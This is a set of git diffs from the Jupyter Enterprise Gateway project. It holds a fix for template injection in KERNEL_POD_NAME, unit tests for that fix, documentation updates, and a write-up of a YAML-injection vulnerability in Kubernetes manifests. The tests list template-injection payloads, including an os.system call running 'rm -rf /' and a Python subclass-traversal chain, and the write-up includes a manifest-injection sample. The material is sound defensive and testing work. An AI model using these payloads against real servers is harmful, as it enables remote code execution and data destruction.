    -    "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
         "LAUNCH_OPTS": ""
       },
       "argv": [
    
  • docs/source/developers/rest-api.rst · +4 -4 · modified
    @@ -178,7 +178,7 @@ the icon filenames to be used by the front-end application.
                 "env": {
                   "SPARK_HOME": "/usr/hdp/current/spark2-client",
                   "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -              "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +              "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
                   "SPARK_OPTS": "--master yarn --deploy-mode client --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} ${KERNEL_EXTRA_SPARK_OPTS}",
                   "LAUNCH_OPTS": ""
                 },
    @@ -215,8 +215,8 @@ the icon filenames to be used by the front-end application.
                 "env": {
                   "SPARK_HOME": "/usr/hdp/current/spark2-client",
                   "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -              "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -              "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
    +              "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +              "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
                   "LAUNCH_OPTS": ""
                 },
                 "display_name": "Spark - Python (YARN Cluster Mode)",
    @@ -346,7 +346,7 @@ In this example, we will start the ``spark_python_yarn_cluster`` kernel with a `
     
     Kernel code execution
     ~~~~~~~~~~~~~~~~~~~~~
    -Upgrading the connection to a websocket and issuing code against that websocket is currently beyond the knowledge of our maintainers.  For this aspect of this discussion we will refer you to our Python `GatewayClient class <https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/client/gateway_client.py#L22>`_ that we use in our integration tests.
    +Upgrading the connection to a websocket and issuing code against that websocket is currently beyond the knowledge of our maintainers.  For this aspect of this discussion we will refer you to our Python `GatewayClient class <https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/client/gateway_client.py#L20>`_ that we use in our integration tests.
     
     .. note::
     
    
  • docs/source/operators/config-availability.md +4 -0 modified
    @@ -88,6 +88,10 @@ As noted above, the availability modes rely on the persisted information relativ
     
     File Kernel Session Persistence stores kernel sessions as files in a specified directory. To enable this form of persistence, set the environment variable `EG_KERNEL_SESSION_PERSISTENCE=True` or configure `FileKernelSessionManager.enable_persistence=True`. To change the directory in which the kernel session file is being saved, either set the environment variable `EG_PERSISTENCE_ROOT` or configure `FileKernelSessionManager.persistence_root` to the directory. By default, the directory used to store a given kernel's session information is the `JUPYTER_DATA_DIR`.
     
    +```{note}
    +Enterprise Gateway handles corrupted or invalid session files gracefully. If a persisted session file contains invalid JSON or cannot be read, the error is logged and that session is skipped rather than preventing Enterprise Gateway from starting.
    +```
    +
     ```{note}
     Because `FileKernelSessionManager` is the default class for kernel session persistence, configuring `EnterpriseGatewayApp.kernel_session_manager_class` to `enterprise_gateway.services.sessions.kernelsessionmanager.FileKernelSessionManager` is not necessary.
     ```
    
  • docs/source/operators/deploy-distributed.md +4 -4 modified
    @@ -131,8 +131,8 @@ After that, you should have a `kernel.json` that looks similar to the one below:
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
         "SPARK_OPTS": "--master yarn --deploy-mode client --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false",
         "LAUNCH_OPTS": ""
       },
    @@ -179,8 +179,8 @@ After that, you should have a `kernel.json` that looks similar to the one below:
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
         "SPARK_OPTS": "--master spark://127.0.0.1:7077  --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID}",
         "LAUNCH_OPTS": ""
       },
    
  • docs/source/operators/deploy-yarn-cluster.md +2 -2 modified
    @@ -103,8 +103,8 @@ After installing the kernel specifications, you should have a `kernel.json` that
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
         "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false",
         "LAUNCH_OPTS": ""
       },
    
  • docs/source/operators/installing-eg.md +10 -1 modified
    @@ -7,7 +7,7 @@ packages for scientific computing and data science.
     Use the following installation steps:
     
     - Download [Anaconda](https://www.anaconda.com/download). We recommend downloading Anaconda's
    -  latest Python version (currently Python 3.11).
    +  latest Python version (currently Python 3.11+).
     
     - Install the version of Anaconda which you downloaded, following the instructions on the download page.
     
    @@ -18,6 +18,15 @@ Use the following installation steps:
     Enterprise Gateway is currently incompatible with `jupyter_client >= 7.0`.  As a result, you should **not** install Enterprise Gateway into the same Python environment in which you intend to run Jupyter Notebook or Jupyter Lab since they will likely be using `jupyter_client >= 7.0`.  Since Enterprise Gateway is tupically installed on servers remote from the notebook users, this is usually not an issue.
     ```
     
    +```{note}
    +**Known Dependency Constraints:** Enterprise Gateway pins several key dependencies:
    +- `jupyter_client < 7` -- Enterprise Gateway's process proxy mechanism is incompatible with the kernel provisioner framework introduced in jupyter_client 7.x. This cap will be removed when EG adopts kernel provisioners (targeted for 4.0).
    +- `jupyter_server < 2.0` -- For the same kernel provisioner compatibility reason.
    +- `pyzmq < 25.0` -- pyzmq 25 removed deprecated APIs that jupyter_client 6.x still relies on.
    +
    +These constraints mean EG should be installed in a dedicated Python environment separate from notebook/lab installations that use newer versions of these packages.
    +```
    +
     ```bash
     # install using pip from pypi
     pip install --upgrade jupyter_enterprise_gateway
    
  • docs/source/users/kernel-envs.md +26 -6 modified
    @@ -76,12 +76,15 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template formatted string
    -    (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be processed for safe substitution against existing list
    -    of environment variables. In case of invalid template (e.g. missing variables)
    -    it will fall back to original way to calculate the pod name using
    -    KERNEL_USERNAME - KERNEL_ID.
    +    also be provided as a template string using simple variable substitution
    +    (e.g. "{{ kernel_username }}-{{ kernel_id }}"). Only simple
    +    {{ variable_name }} references are supported -- Jinja2 filters and
    +    expressions are NOT supported and will be rejected for security reasons.
    +    Available variables include all KERNEL_* environment variables (lowercased,
    +    e.g. kernel_username, kernel_namespace) plus kernel_id. Variable names
    +    must start with a letter and contain only letters, digits, and underscores.
    +    In case of invalid template syntax or missing variables, Enterprise Gateway
    +    will fall back to the default pod name using KERNEL_USERNAME-KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    @@ -116,6 +119,23 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         should be submitted in the request. In environments in which impersonation is
         used it represents the target of the impersonation.
     
    +  KERNEL_VOLUMES=<from user> or None
    +    Kubernetes and Spark Operator only. A JSON-formatted string defining
    +    Kubernetes volume specifications to mount into the kernel pod. The value
    +    is parsed via yaml.safe_load and passed to the kernel pod or
    +    SparkApplication template as the kernel_volumes variable. Example:
    +    KERNEL_VOLUMES='[{"name": "my-vol", "persistentVolumeClaim": {"claimName": "my-pvc"}}]'
    +    See the kernel-pod.yaml.j2 and sparkoperator templates for how volumes
    +    are rendered.
    +
    +  KERNEL_VOLUME_MOUNTS=<from user> or None
    +    Kubernetes and Spark Operator only. A JSON-formatted string defining
    +    Kubernetes volumeMount specifications for the kernel container. The value
    +    is parsed via yaml.safe_load and passed to the kernel pod or
    +    SparkApplication template as the kernel_volume_mounts variable. Example:
    +    KERNEL_VOLUME_MOUNTS='[{"name": "my-vol", "mountPath": "/data"}]'
    +    Must correspond to volumes defined via KERNEL_VOLUMES.
    +
       KERNEL_WORKING_DIR=<from user> or None
         Containers only.  This value should model the directory in which the active
         notebook file is running.   It is intended to be used in conjunction with appropriate volume
    
1e6b2f354976

Fix KERNEL_POD_NAME substitution to avoid SSTI (#1412)

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Aug 9, 2025 · Fixed in 3.3.0 · via ghsa-release-walk
4 files changed · +287 -9
  • docs/source/users/kernel-envs.md +5 -2 modified
    @@ -76,9 +76,12 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template string
    +    also be provided as a jinja2 template formatted string
         (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be evaluated against existing list of environment variables.
    +    which will be processed for safe substitution against existing list
    +    of environment variables. In case of invalid template (e.g. missing variables)
    +    it will fall back to original way to calculate the pod name using
    +    KERNEL_USERNAME - KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    
  • enterprise_gateway/services/processproxies/k8s.py +50 -6 modified
    @@ -11,7 +11,6 @@
     from typing import Any
     
     import urllib3
    -from jinja2 import BaseLoader, Environment
     from kubernetes import client, config
     
     from ..kernels.remotemanager import RemoteKernelManager
    @@ -216,6 +215,42 @@ def terminate_container_resources(self) -> bool | None:
     
             return result
     
    +    def _safe_template_substitute(self, template_str: str, variables: dict) -> str | None:
    +        """
    +        Safely substitute variables in Jinja2-style template syntax.
    +        Only supports simple variable substitution: {{ variable_name }}
    +        Logs missing variables and returns None if any are missing.
    +        """
    +        # Pattern to match {{ variable_name }} with optional whitespace
    +        # Explicitly exclude variables starting with underscore to prevent magic method attacks
    +        pattern = r'\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}'
    +        missing_vars = []
    +
    +        def replace_var(match):
    +            var_name = match.group(1)
    +            if var_name in variables:
    +                return str(variables[var_name])
    +            else:
    +                missing_vars.append(var_name)
    +                return match.group(0)  # Keep original placeholder
    +
    +        result = re.sub(pattern, replace_var, template_str)
    +
    +        # Check if there are any remaining {{ }} patterns that didn't match our simple pattern
    +        # This catches malicious templates like {{ foo.__class__ }} or {{ 1+1 }}
    +        if '{{' in result and '}}' in result:
    +            self.log.warning(
    +                "Invalid template syntax detected in KERNEL_POD_NAME: contains unsupported expressions"
    +            )
    +            return None
    +
    +        # Log missing variables and return None if any are missing
    +        if missing_vars:
    +            self.log.warning(f"Template variables not found in KERNEL_POD_NAME: {missing_vars}")
    +            return None  # Signal caller to use default
    +
    +        return result
    +
         def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             pod_name = kwargs["env"].get("KERNEL_POD_NAME")
     
    @@ -224,16 +259,25 @@ def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             else:
                 self.log.debug(f"Processing KERNEL_POD_NAME based on env var => {pod_name}")
                 if "{{" in pod_name and "}}" in pod_name:
    -                self.log.debug("Processing KERNEL_POD_NAME as jinja template")
    -                # Create Jinja2 environment
    +                self.log.debug("Processing KERNEL_POD_NAME template variables")
                     keywords = {}
                     for name, value in kwargs["env"].items():
                         if name.startswith("KERNEL_"):
                             keywords[name.lower()] = value
                     keywords["kernel_id"] = self.kernel_id
    -                self.log.debug("Processing pod_name jinja template")
    -                env = Environment(loader=BaseLoader(), autoescape=True)
    -                pod_name = env.from_string(pod_name).render(**keywords)
    +
    +                # Safe template substitution with fallback
    +                substituted = self._safe_template_substitute(pod_name, keywords)
    +                if substituted is None:
    +                    # Fall back to default if template variables are missing
    +                    self.log.warning(
    +                        "Falling back to default pod name due to missing template variables"
    +                    )
    +                    pod_name = (
    +                        KernelSessionManager.get_kernel_username(**kwargs) + "-" + self.kernel_id
    +                    )
    +                else:
    +                    pod_name = substituted
     
             # Rewrite pod_name to be compatible with DNS name convention
             # And put back into env since kernel needs this
    
  • enterprise_gateway/tests/test_process_proxy.py +231 -0 added
    @@ -0,0 +1,231 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for Kubernetes process proxy security fixes."""
    +
    +import unittest
    +from unittest.mock import Mock, patch
    +
    +# Mock Kubernetes configuration before importing the module
    +with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
    +    from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
    +
    +
    +class TestKubernetesProcessProxy(unittest.TestCase):
    +    """Test secure template substitution in Kubernetes process proxy."""
    +
    +    def setUp(self):
    +        """Set up test fixtures."""
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"  # Mock port range
    +
    +        # Mock proxy config
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +
    +        # Mock KernelSessionManager methods
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +            self.proxy.kernel_id = "test-kernel-id"
    +
    +    def test_valid_template_substitution(self):
    +        """Test valid template variable substitution."""
    +        test_cases = [
    +            # Basic variable substitution
    +            ("{{ kernel_id }}", {"kernel_id": "test-123"}, "test-123"),
    +            # Multiple variables
    +            (
    +                "{{ kernel_namespace }}-{{ kernel_id }}",
    +                {"kernel_namespace": "default", "kernel_id": "test-123"},
    +                "default-test-123",
    +            ),
    +            # Variables with underscores
    +            ("{{ kernel_image_pull_policy }}", {"kernel_image_pull_policy": "Always"}, "Always"),
    +            # Whitespace handling
    +            ("{{   kernel_id   }}", {"kernel_id": "test-123"}, "test-123"),
    +        ]
    +
    +        for template, variables, expected in test_cases:
    +            with self.subTest(template=template):
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertEqual(result, expected)
    +
    +    def test_missing_variables_fallback(self):
    +        # Test the full pod name determination process
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming: kernel_username + "-" + kernel_id
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_malicious_template_injection_prevention(self):
    +        """Test prevention of malicious template injection attacks."""
    +        malicious_templates = [
    +            # Python code execution attempts
    +            "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].exit() }}",
    +            "{{ __import__('os').system('rm -rf /') }}",
    +            "{{ exec('print(\"pwned\")') }}",
    +            "{{ eval('1+1') }}",
    +            # Attribute access attempts
    +            "{{ kernel_id.__class__ }}",
    +            "{{ kernel_id.__dict__ }}",
    +            "{{ kernel_id.__globals__ }}",
    +            # Function calls
    +            "{{ range(10) }}",
    +            "{{ len(kernel_id) }}",
    +            "{{ str.upper(kernel_id) }}",
    +            # Jinja2 filters and expressions
    +            "{{ kernel_id|upper }}",
    +            "{{ kernel_id + '_suffix' }}",
    +            "{{ 1 + 1 }}",
    +            # Complex expressions
    +            "{{ kernel_id if kernel_id else 'default' }}",
    +            "{{ kernel_id[:5] }}",
    +        ]
    +
    +        variables = {"kernel_id": "test-123"}
    +
    +        for malicious_template in malicious_templates:
    +            with self.subTest(template=malicious_template), patch.object(
    +                self.proxy, 'log'
    +            ) as mock_log:
    +                result = self.proxy._safe_template_substitute(malicious_template, variables)
    +                # All malicious templates should be treated as invalid and return None
    +                self.assertIsNone(result)
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +    def test_pod_name_determination_with_templates(self):
    +        """Test complete pod name determination with template processing."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should get processed and DNS-normalized
    +            self.assertEqual(result, "production-test-kernel-id")
    +
    +    def test_pod_name_determination_with_malicious_template(self):
    +        """Test pod name determination with malicious template falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ __import__('os').system('evil') }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_determination_with_missing_variables(self):
    +        """Test pod name determination with missing variables falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_without_template(self):
    +        """Test pod name determination without template syntax."""
    +        kwargs = {"env": {"KERNEL_POD_NAME": "static-pod-name", "KERNEL_NAMESPACE": "production"}}
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should use as-is and DNS-normalize
    +            self.assertEqual(result, "static-pod-name")
    +
    +    def test_pod_name_dns_normalization(self):
    +        """Test DNS name normalization of pod names."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}_{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "Test-Namespace",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should be DNS-normalized (lowercase, dashes only)
    +            self.assertEqual(result, "test-namespace-test-kernel-id")
    +
    +    def test_regex_pattern_validation(self):
    +        """Test that only valid variable names are matched by regex."""
    +        valid_vars = [
    +            "kernel_id",
    +            "kernel_namespace",
    +            "kernel_image_pull_policy",
    +            "a",
    +            "var123",
    +            "KERNEL_ID",
    +        ]
    +
    +        # Variables that should be blocked by the regex pattern
    +        invalid_vars = [
    +            "123invalid",  # starts with number
    +            "invalid-var",  # contains dash
    +            "invalid.var",  # contains dot
    +            "invalid var",  # contains space
    +            "invalid@var",  # contains special char
    +            "_private_var",  # starts with underscore (security risk)
    +            "__class__",  # magic method (security risk)
    +            "__dict__",  # magic method (security risk)
    +            "__globals__",  # magic method (security risk)
    +        ]
    +
    +        variables = {var: "value" for var in valid_vars}
    +        # Also add underscore variables to test they're not substituted even if present
    +        variables.update(
    +            {"_private_var": "private", "__class__": "dangerous", "__dict__": "dangerous"}
    +        )
    +
    +        # Valid variables should be substituted
    +        for var in valid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            result = self.proxy._safe_template_substitute(template, variables)
    +            self.assertEqual(result, "value", f"Valid variable {var} should be substituted")
    +
    +        # Invalid variables should be treated as having invalid syntax
    +        for var in invalid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            with patch.object(self.proxy, 'log') as mock_log:
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertIsNone(result, f"Invalid variable {var} should be rejected")
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions since invalid var names don't match regex
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +
    +if __name__ == '__main__':
    +    unittest.main()
    
  • Makefile +1 -1 modified
    @@ -67,7 +67,7 @@ clean-env: ## Remove conda env
     lint: ## Check code style
     	@pip install -q -e ".[lint]"
     	@pip install -q pipx
    -	ruff .
    +	ruff check .
     	black --check --diff --color .
     	mdformat --check *.md
     	pipx run 'validate-pyproject[all]' pyproject.toml
    

Vulnerability mechanics

Root cause

"Environment variables are interpolated into Kubernetes manifests without proper YAML escaping, allowing injection of malicious YAML."

Attack vector

An attacker can send a crafted API request to the `/api/kernels` endpoint with malicious content in environment variables such as `KERNEL_WORKING_DIR` [ref_id=1]. These variables are interpolated into the Kubernetes manifest template without YAML-aware escaping, so the attacker can inject YAML syntax: duplicate keys that overwrite existing fields such as `securityContext`, or document markers (`---` to start a new document, `...` to end one) that create additional Kubernetes resources [ref_id=1, ref_id=2].
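
The mechanism can be illustrated with a minimal sketch that uses only the Python standard library. The one-field template, the `render_naively` and `count_documents` helpers, and the payload are all hypothetical stand-ins; the real `kernel-pod.yaml.j2` template is rendered with Jinja2 and is much larger. Document counting is simplified here to counting bare `---` lines.

```python
# Hypothetical one-field manifest template (illustration only).
TEMPLATE = (
    "apiVersion: v1\n"
    "kind: Pod\n"
    "spec:\n"
    "  containers:\n"
    "  - name: kernel\n"
    "    workingDir: {working_dir}\n"
)


def render_naively(working_dir: str) -> str:
    """Interpolate the value with no YAML-aware escaping."""
    return TEMPLATE.format(working_dir=working_dir)


def count_documents(manifest: str) -> int:
    """Count YAML documents as one plus the number of bare '---' lines (simplified)."""
    separators = sum(1 for line in manifest.splitlines() if line.rstrip() == "---")
    return separators + 1


# Illustrative attacker-controlled value: it ends the workingDir field,
# then opens a second YAML document describing another resource.
payload = "/tmp\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: injected\n"

benign = render_naively("/home/jovyan")
injected = render_naively(payload)

print(count_documents(benign))
print(count_documents(injected))
```

Under these assumptions the benign value yields one document, while the crafted value yields two, because the newline and `---` in the value are copied into the manifest verbatim.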

Affected code

The vulnerability lies in the interpolation of environment variables into Kubernetes manifests via Jinja2 templates. Specifically, the `launch_kubernetes.py` script at lines 130-137 applies `yaml.safe_load()` to environment variables and then renders them into the `kernel-pod.yaml.j2` template without YAML-aware escaping [ref_id=1, ref_id=2]. Separately, `enterprise_gateway/services/processproxies/k8s.py` rendered `KERNEL_POD_NAME` as a Jinja2 template, which commit 1e6b2f354976 replaced with simple variable substitution.
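
The approach taken for `KERNEL_POD_NAME` in fix commit 1e6b2f354976 can be restated as a standalone function. This is a simplified sketch rather than the project's code: the name `substitute_simple_vars` is hypothetical, logging is omitted, and the regular expression follows the pattern shown in that commit's diff.

```python
import re
from typing import Optional

# A letter followed by letters, digits, or underscores, wrapped in {{ }}.
# Names starting with an underscore never match, so {{ __class__ }} is rejected.
SIMPLE_VAR = re.compile(r"\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}")


def substitute_simple_vars(template: str, variables: dict) -> Optional[str]:
    """Replace {{ name }} placeholders; return None if anything else remains."""
    missing = []

    def replace(match: "re.Match[str]") -> str:
        name = match.group(1)
        if name in variables:
            return str(variables[name])
        missing.append(name)
        return match.group(0)  # keep the placeholder so it is detected below

    result = SIMPLE_VAR.sub(replace, template)

    # Unknown variables, filters, attribute access, and expressions all leave
    # '{{ ... }}' behind; the caller is expected to fall back to a default name.
    if missing or ("{{" in result and "}}" in result):
        return None
    return result


names = {"kernel_namespace": "default", "kernel_id": "test-123"}
print(substitute_simple_vars("{{ kernel_namespace }}-{{ kernel_id }}", names))
print(substitute_simple_vars("{{ kernel_id|upper }}", names))
```

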